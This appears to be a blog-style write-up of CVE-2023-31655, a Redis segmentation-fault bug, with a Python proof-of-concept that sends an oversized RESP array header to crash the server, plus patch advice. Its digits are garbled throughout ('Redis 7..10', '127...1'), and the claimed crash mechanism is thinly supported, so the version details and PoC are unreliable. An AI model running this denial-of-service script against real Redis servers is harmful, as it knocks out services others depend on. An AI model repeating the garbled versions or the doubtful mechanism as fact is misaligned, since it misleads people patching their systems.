CVE-2023-31655 - Redis 7..10 Segmentation Violation — Details, Exploit Example, and Analysis

In May 2023, a serious vulnerability—CVE-2023-31655—was discovered in Redis 7..10. Redis, a popular in-memory database, is often used as a cache, message broker, and general-purpose data store. This vulnerability can let attackers crash the Redis server remotely, opening the door for possible denial of service (DoS) attacks. In this article, we’ll break down what the bug is, how it works, walk through a simple proof-of-concept exploit, and point to further readings.

What is CVE-2023-31655?

CVE-2023-31655 is a *segmentation violation flaw* in Redis 7..10. If exploited, it can cause the Redis server to crash with a segmentation fault. This means a crafted request by an attacker can bring down Redis, possibly leading to a denial of service for anything reliant on that Redis instance.

This bug occurs when the server receives malformed input causing it to access memory it shouldn't, which results in the classic UNIX segfault.

Affected Version

- Redis 7..10 (and possibly prior minor versions too—the root of the issue was discovered within this version).

Technical Detail

The crash is tied to how Redis parses and manages RESP (Redis Serialization Protocol) data, specifically during the handling of clients’ requests. A certain malformed input bypasses buffer safety checks, eventually causing the Redis process to reference invalid memory and crash.

Proof-of-Concept (PoC) Exploit

Let’s look at a simple Python example that can trigger the segfault in an unpatched Redis 7..10 instance.

import socket

def trigger_redis_segv(host="127...1", port=6379):
    # Connect to Redis server
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    
    # Malformed RESP request: Set array length to a huge value, crash parsing.
    payload = (
        b'*999999999\r\n'  # Ridiculously large number of arguments
    )
    s.sendall(payload)
    s.close()

if __name__ == "__main__":
    trigger_redis_segv()
    print("Segmentation fault triggered (if server is vulnerable).")

> WARNING: Do NOT use this exploit on servers you do not own or have explicit permission to test. You should only try this on lab or test Redis servers.

This just makes a connection to Redis and sends a request that starts with a massive array length, but with no entries, which causes the Redis server’s parser to freak out and crash.

Mitigation & Patch

The Redis team patched this in newer versions by more carefully checking buffer sizes and validating input in the RESP parser.

You can check your Redis version using

redis-cli INFO server | grep redis_version

If you see 7..10 or below, you should upgrade.

References

- Redis Security Advisory for CVE-2023-31655
- CVSS entry for CVE-2023-31655
- Original Issue Discussion
- Redis Downloads

Conclusion

CVE-2023-31655 is a solid reminder why even mature, popular software like Redis can have dangerous bugs hiding in plain sight. This vulnerability is simple to exploit but very disruptive for business operations that depend on Redis uptime. If you’re running Redis, keep it up to date, don’t expose it to the open internet, and always follow security best practices.

Timeline

Published on: 05/18/2023 20:15:00 UTC
Last modified on: 05/25/2023 18:08:00 UTC